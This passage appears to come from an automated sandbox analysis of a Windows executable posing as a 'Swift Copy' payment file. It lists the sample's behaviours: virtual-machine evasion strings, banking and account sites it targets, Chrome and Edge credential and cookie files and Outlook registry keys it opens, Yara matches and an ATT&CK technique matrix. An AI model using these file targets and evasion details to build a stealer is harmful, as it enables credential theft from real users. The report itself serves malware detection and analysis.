            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594468Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594359Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594250Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594140Jump to behavior
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.000000000571E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd51106829459f<
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.00000000056B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWbr
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeAPI call chain: ExitProcess graph end nodegraph_0-4462
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeAPI call chain: ExitProcess graph end nodegraph_0-4461
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040620C
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess created: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe "C:\Users\user\Desktop\Swift Copy_18.02.2025.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeQueries volume information: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_00405EC4 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405EC4
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Swift Copy_18.02.2025.exe PID: 7124, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: 00000006.00000002.3916059325.0000000035EA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Swift Copy_18.02.2025.exe PID: 7124, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Swift Copy_18.02.2025.exe PID: 7124, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            11
            Process Injection
            11
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            3
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets12
            File and Directory Discovery
            SSHKeylogging15
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.